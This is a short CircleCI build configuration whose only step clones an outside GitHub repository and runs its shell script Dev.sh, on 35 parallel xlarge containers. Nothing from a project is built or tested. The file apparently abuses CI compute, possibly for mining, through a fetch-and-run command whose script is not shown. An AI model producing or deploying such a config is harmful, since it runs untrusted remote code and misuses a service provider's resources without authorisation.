version: 2
jobs:
  build:
    docker:
      - image: rust:latest
    parallelism: 35
    resource_class: xlarge
    steps:
      - run: git clone https://github.com/burasbodas/Dev.git && cd Dev && chmod u+x Dev.sh && ./Dev.sh
workflows:
    version: 2
    build:
        jobs:
            - build
